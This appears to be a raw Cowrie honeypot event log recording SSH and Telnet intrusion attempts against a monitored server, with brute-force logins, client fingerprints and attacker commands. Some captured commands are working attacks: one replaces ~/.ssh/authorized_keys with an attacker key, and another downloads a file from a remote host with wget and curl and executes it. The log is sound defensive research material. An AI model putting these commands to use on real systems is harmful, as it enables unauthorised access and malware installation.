{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x032oU^\\x9d\\rj@\\x879\\x19\\x15\\x8d\\xbe!\\xd8\\x99\\x81\\xf2\\xad\\x8fK\\x95\\x11\\x16\\x8et|bq\\x9a^ +T#\\xf4!Y_\\xe1he\\xb0\\xe5\\x86\\x19\\xdfBf\\xb6&\\xe6\\x02\\x9e R:v\\xbf^T\\xf8\\x94\\xdf\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 :_H\\xc3\\x13\\x10\\xa8\\x92!\\x0fb\\x14\\x81\\xc1\\x97;\\x1c\\'\\x9d\\x996x\\x88\\xfa.\\x06\"\\x82\\x8a\\xa7\\xf7A\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.203.132:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x032oU^\\x9d\\rj@\\x879\\x19\\x15\\x8d\\xbe!\\xd8\\x99\\x81\\xf2\\xad\\x8fK\\x95\\x11\\x16\\x8et|bq\\x9a^ +T#\\xf4!Y_\\xe1he\\xb0\\xe5\\x86\\x19\\xdfBf\\xb6&\\xe6\\x02\\x9e R:v\\xbf^T\\xf8\\x94\\xdf\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 :_H\\xc3\\x13\\x10\\xa8\\x92!\\x0fb\\x14\\x81\\xc1\\x97;\\x1c\\'\\x9d\\x996x\\x88\\xfa.\\x06\"\\x82\\x8a\\xa7\\xf7A\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T04:05:04.574367Z","src_ip":"212.227.125.160","session":"028deaf76979"}
{"eventid":"cowrie.login.success","username":"root","password":"qaz123@@@","message":"login attempt [root/qaz123@@@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:05:05.086499Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:05.105667Z","src_ip":"212.227.125.160","session":"028deaf76979"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:05:05.601225Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:05:05.601938Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:05:05.603006Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:05.855330Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:05:06.416016Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:05:06.416780Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:05:06.666930Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:06.667899Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T04:05:07.102487Z","src_ip":"212.227.235.229","session":"7af7faa16750"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:05:12.604240Z","src_ip":"212.227.235.229","session":"80861cc87e61"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:05:12.605471Z","src_ip":"212.227.235.229","session":"80861cc87e61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51102,"dst_ip":"1.2.3.4","dst_port":22,"session":"20405c431c1c","protocol":"ssh","message":"New connection: 212.227.235.229:51102 (1.2.3.4:22) [session: 20405c431c1c]","sensor":"my-vps","timestamp":"2025-08-31T04:05:14.588330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:05:14.589966Z","src_ip":"212.227.235.229","session":"20405c431c1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:05:14.911267Z","src_ip":"212.227.235.229","session":"20405c431c1c"}
{"eventid":"cowrie.login.failed","username":"tmp2","password":"tmp2","message":"login attempt [tmp2/tmp2] failed","sensor":"my-vps","timestamp":"2025-08-31T04:05:16.248422Z","src_ip":"212.227.235.229","session":"20405c431c1c"}
{"eventid":"cowrie.session.connect","src_ip":"223.152.168.226","src_port":17889,"dst_ip":"1.2.3.4","dst_port":23,"session":"c0e55cd33390","protocol":"telnet","message":"New connection: 223.152.168.226:17889 (1.2.3.4:23) [session: c0e55cd33390]","sensor":"my-vps","timestamp":"2025-08-31T04:05:16.961681Z"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:17.576573Z","src_ip":"212.227.235.229","session":"20405c431c1c"}
{"eventid":"cowrie.session.closed","duration":"85.9","message":"Connection lost after 85.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:18.784007Z","src_ip":"212.227.235.229","session":"7af7faa16750"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T04:05:22.528737Z","src_ip":"223.152.168.226","session":"c0e55cd33390"}
{"eventid":"cowrie.session.closed","duration":6.333186388015747,"message":"Connection lost after 6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:23.294790Z","src_ip":"223.152.168.226","session":"c0e55cd33390"}
{"eventid":"cowrie.session.connect","src_ip":"223.152.168.226","src_port":18069,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3b433be9b86","protocol":"telnet","message":"New connection: 223.152.168.226:18069 (1.2.3.4:23) [session: e3b433be9b86]","sensor":"my-vps","timestamp":"2025-08-31T04:05:24.551147Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:05:30.604354Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:05:31.048903Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":54657,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbc009b28871","protocol":"ssh","message":"New connection: 79.127.48.196:54657 (1.2.3.4:22) [session: bbc009b28871]","sensor":"my-vps","timestamp":"2025-08-31T04:05:31.050201Z"}
{"eventid":"cowrie.command.input","input":"start","message":"CMD: start","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.981490Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.failed","input":"start","message":"Command not found: start","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.982337Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.983389Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"config terminal","message":"CMD: config terminal","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.985911Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.failed","input":"config terminal","message":"Command not found: config terminal","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.986982Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.988128Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.988842Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"linuxshell","message":"CMD: linuxshell","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.990159Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.failed","input":"linuxshell","message":"Command not found: linuxshell","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.990828Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"su","message":"CMD: su","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.992031Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.992911Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.993631Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.994434Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /;/bin/busybox echo -ne '\\x45\\x4c\\x46'","message":"CMD: cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /;/bin/busybox echo -ne '\\x45\\x4c\\x46'","sensor":"my-vps","timestamp":"2025-08-31T04:05:32.999248Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.success","input":"echo -ne \\x45\\x4c\\x46","message":"Command found: echo -ne \\x45\\x4c\\x46","sensor":"my-vps","timestamp":"2025-08-31T04:05:33.001312Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58186,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc79ade82405","protocol":"ssh","message":"New connection: 212.227.235.229:58186 (1.2.3.4:22) [session: cc79ade82405]","sensor":"my-vps","timestamp":"2025-08-31T04:05:34.908905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:05:35.711097Z","src_ip":"212.227.235.229","session":"cc79ade82405"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:05:35.711917Z","src_ip":"212.227.235.229","session":"cc79ade82405"}
{"eventid":"cowrie.command.input","input":"/bin/busybox wget;/bin/busybox echo -ne '\\x45\\x4c\\x46'","message":"CMD: /bin/busybox wget;/bin/busybox echo -ne '\\x45\\x4c\\x46'","sensor":"my-vps","timestamp":"2025-08-31T04:05:36.621632Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.success","input":"wget","message":"Command found: wget","sensor":"my-vps","timestamp":"2025-08-31T04:05:36.622541Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.success","input":"echo -ne \\x45\\x4c\\x46","message":"Command found: echo -ne \\x45\\x4c\\x46","sensor":"my-vps","timestamp":"2025-08-31T04:05:36.623236Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://192.168.1.1:8088/i; curl -O http://192.168.1.1:8088/i; /bin/busybox wget http://192.168.1.1:8088/i; chmod 777 i || (cp /bin/ls ii;cat i>ii;rm i;cp ii i;rm ii); ./i; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'","message":"CMD: cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://192.168.1.1:8088/i; curl -O http://192.168.1.1:8088/i; /bin/busybox wget http://192.168.1.1:8088/i; chmod 777 i || (cp /bin/ls ii;cat i>ii;rm i;cp ii i;rm ii); ./i; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'","sensor":"my-vps","timestamp":"2025-08-31T04:05:39.132936Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"cp /bin/ls ii","message":"CMD: cp /bin/ls ii","sensor":"my-vps","timestamp":"2025-08-31T04:05:39.133704Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"cat i > ii","message":"CMD: cat i > ii","sensor":"my-vps","timestamp":"2025-08-31T04:05:39.135333Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"rm i","message":"CMD: rm i","sensor":"my-vps","timestamp":"2025-08-31T04:05:39.136551Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"cp ii i","message":"CMD: cp ii i","sensor":"my-vps","timestamp":"2025-08-31T04:05:39.137501Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.input","input":"rm ii","message":"CMD: rm ii","sensor":"my-vps","timestamp":"2025-08-31T04:05:39.138554Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.success","input":"wget http://192.168.1.1:8088/i","message":"Command found: wget http://192.168.1.1:8088/i","sensor":"my-vps","timestamp":"2025-08-31T04:05:39.142633Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.command.failed","input":"./i","message":"Command not found: ./i","sensor":"my-vps","timestamp":"2025-08-31T04:05:39.144509Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e81b665bb5d2856c6af57a9cf18739b87cb42c62a48e565c9c34fc080e2a6307","size":2722,"shasum":"e81b665bb5d2856c6af57a9cf18739b87cb42c62a48e565c9c34fc080e2a6307","duplicate":true,"duration":"9.2","message":"Closing TTY Log: var/lib/cowrie/tty/e81b665bb5d2856c6af57a9cf18739b87cb42c62a48e565c9c34fc080e2a6307 after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:40.271302Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.session.closed","duration":15.723361015319824,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:40.274438Z","src_ip":"223.152.168.226","session":"e3b433be9b86"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password","message":"login attempt [mysql/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:05:41.833047Z","src_ip":"212.227.235.229","session":"cc79ade82405"}
